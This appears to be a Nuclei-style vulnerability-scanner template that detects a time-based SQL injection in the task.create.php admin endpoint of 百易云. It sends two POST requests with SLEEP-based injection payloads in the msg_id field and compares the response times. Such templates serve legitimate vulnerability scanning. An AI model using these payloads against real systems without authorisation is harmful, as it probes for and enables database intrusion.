id: baiyiyun-task-create-sql

info:
  name: 百易云 task.create.php sql注入漏洞
  author: baiyiyun
  severity: high
  tags: baiyiyun

http:
  - raw:
      - |
        POST /adminx/task.create.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
        Connection: keep-alive
        Accept: */*
        Accept-Language: en
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate, br

        msg_id=1%20OR%20(SELECT%201337%20FROM%20(SELECT(SLEEP(2)))xxxx)&org_id=

      - |
        POST /adminx/task.create.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
        Connection: keep-alive
        Accept: */*
        Accept-Language: en
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate, br

        msg_id=1%20OR%20(SELECT%201337%20FROM%20(SELECT(SLEEP(4)))xxxx)&org_id=

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: dsl
        dsl:
          - 'duration_1>=2 && duration_1<4'  
          - 'duration_2>=4 && duration_2<6'
        condition: and

